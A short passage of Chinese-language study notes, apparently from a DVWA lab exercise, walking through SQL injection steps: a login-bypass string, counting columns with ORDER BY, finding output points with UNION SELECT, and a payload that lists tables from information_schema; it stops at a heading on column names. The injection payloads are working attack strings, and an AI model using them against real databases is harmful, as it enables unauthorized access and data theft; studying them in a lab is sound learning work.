万能密码 admin’ or 1=1 #
漏洞利用
猜解SQL查询语句中的字段
order by
1个字段没问题
2个字段也没问题
order by 3 发现报错
说明这个数据库只有两个字段
判断回显点
union select 联合查询
查询当前数据库
union select 字段1,字段2 #
查询表
1’ union select 1,table_name from information_schema .tables where table_schema=’dvwa’ #
查询表中的字段名